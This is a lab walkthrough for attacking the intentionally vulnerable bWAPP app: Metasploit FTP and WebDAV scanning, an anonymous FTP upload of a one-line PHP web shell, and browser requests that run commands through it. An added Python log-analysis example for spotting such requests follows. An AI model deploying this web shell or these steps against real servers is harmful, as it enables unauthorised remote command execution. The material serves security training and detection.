The video shows how to exploit bWAPP through FTP and WebDAV using the Metasploit Framework. Here are the steps:
- First, run nmap and closely verify all the services
- Run the Metasploit Framework, exploit WebDAV and enable it
- Run FTP, log in, and upload your backdoor
- Access your backdoor through a web browser and get a reverse shell
# msfconsole
msf > search ftp_login
msf > use auxiliary/scanner/ftp/ftp_login
msf auxiliary(ftp_login) > show options
msf auxiliary(ftp_login) > set USERNAME anonymous
msf auxiliary(ftp_login) > show options
msf auxiliary(ftp_login) > set RHOSTS 192.168.25.139
msf auxiliary(ftp_login) > exploit
msf auxiliary(ftp_login) > search webdav_scanner
msf auxiliary(ftp_login) > use auxiliary/scanner/http/webdav_scanner
msf auxiliary(webdav_scanner) > show options
msf auxiliary(webdav_scanner) > set RHOSTS 192.168.25.139
msf auxiliary(webdav_scanner) > set PATH /webdav/
msf auxiliary(webdav_scanner) > exploit

# ftp
ftp> o
(to) 192.168.25.139
Name (192.168.25.139:root): anonymous
Password:
ftp> ls
ftp> put backdoor.php
backdoor.php code:
<?php print_r(($_GET['x'])?exec($_GET['x']):''); ?>
Address Bar:
192.168.25.139/webdav/backdoor.php?x=ls
192.168.25.139/webdav/backdoor.php?x=pwd
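
From the defender's side, the address-bar requests above are visible in the web server's access log as script requests inside a directory that should only hold uploaded files. The following is an added example, not part of the original page: it assumes Apache combined-format logs and that the FTP-writable directory is served under /webdav/; the sample log lines, client address and function name are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote, parse_qsl

# Assumptions: Apache "combined" access log; the FTP-writable directory is
# served under /webdav/ as on the page; the extension list is illustrative.
UPLOAD_PREFIX = "/webdav/"
SCRIPT_EXT = (".php", ".phtml", ".php5", ".phar")

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_script_hits(lines):
    """Flag requests for server-side scripts inside the upload directory."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a parsable access-log line
        url = urlsplit(m["target"])
        path = unquote(url.path)  # decode %xx so encoded paths still match
        low = path.lower()
        if not (low.startswith(UPLOAD_PREFIX) and low.endswith(SCRIPT_EXT)):
            continue
        # 2xx: the file exists and was served (executed, if PHP is enabled there).
        kind = "script-executed" if m["status"].startswith("2") else "script-probe"
        findings.append({
            "client": m["ip"], "time": m["ts"], "kind": kind, "path": path,
            "params": dict(parse_qsl(url.query, keep_blank_values=True)),
        })
    return findings

# Constructed sample log lines (client address and timestamps are made up).
SAMPLE_LOG = [
    '192.168.25.50 - - [01/Jan/2024:10:00:01 +0000] "GET /bWAPP/login.php HTTP/1.1" 200 4013 "-" "Mozilla/5.0"',
    '192.168.25.50 - - [01/Jan/2024:10:05:11 +0000] "GET /webdav/backdoor.php?x=ls HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '192.168.25.50 - - [01/Jan/2024:10:05:30 +0000] "GET /webdav/backdoor.php?x=pwd HTTP/1.1" 200 16 "-" "Mozilla/5.0"',
    '192.168.25.50 - - [01/Jan/2024:10:06:02 +0000] "GET /webdav/notes.txt HTTP/1.1" 200 85 "-" "Mozilla/5.0"',
    '192.168.25.50 - - [01/Jan/2024:10:06:40 +0000] "GET /webdav/test.php HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in find_script_hits(SAMPLE_LOG):
        print(f["time"], f["client"], f["kind"], f["path"], f["params"])
```

Any hit from this check also points at the underlying misconfiguration: a directory writable over anonymous FTP should not be one where the web server executes scripts.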